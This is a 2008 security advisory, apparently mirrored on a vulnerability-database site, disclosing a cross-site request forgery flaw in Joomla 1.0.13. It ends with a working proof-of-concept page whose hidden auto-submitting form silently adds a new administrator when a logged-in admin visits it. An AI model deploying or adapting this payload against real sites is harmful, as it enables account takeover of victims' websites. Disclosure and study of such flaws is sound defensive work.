`Author: Jose Carlos Nieto.
Date: Jan 08, 2008
Severity: Mild
There exists a Cross Site Request Forgery security hole in Joomla 1.0.13.
Background
==========
*Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source <http://en.wikipedia.org/wiki/Open_source_software> content management system <http://en.wikipedia.org/wiki/Content_management_system> for publishing content
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets <http://en.wikipedia.org/wiki/Intranet>.
Joomla! is licensed under the GPL <http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork <http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo <http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.
Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.
Summary
=======
Joomla! has no CSRF protection. A malicious user can trick an administrator into viewing
a specially crafted webpage containing an exploit, this exploit can execute (without permission)
any command the administrator would normally execute, such as publish a content or even add a new
administrator.
Solution
========
This problem has no solution at this time.
Disclosure timeline
===================
Oct 18 2007 - Vulnerability found.
Oct 18 2007 - Vulnerability reported to vendor.
Oct 18 2007 - Answer from vendor.
Jan 08 2008 - Advisory released.
Proof of Concept
================
If a logged in administrator visits this page a new administrator will be added to the victim's
Joomla powered website.
---- exploit code ----
<script type="text/javascript">
window.onload = function() {
var url = "http://joomlasite.com/joomla/administrator/index2.php";
var gid = 25;
var user = 'custom_username';
var pass = 'custom_password';
var email = '[email protected]';
var param = {
name: user,
username: user,
email: email,
password: pass,
password2: pass,
gid: gid,
block: 0,
option: 'com_users',
task: 'save',
sendEmail: 1
};
var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">
---- exploit code ----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation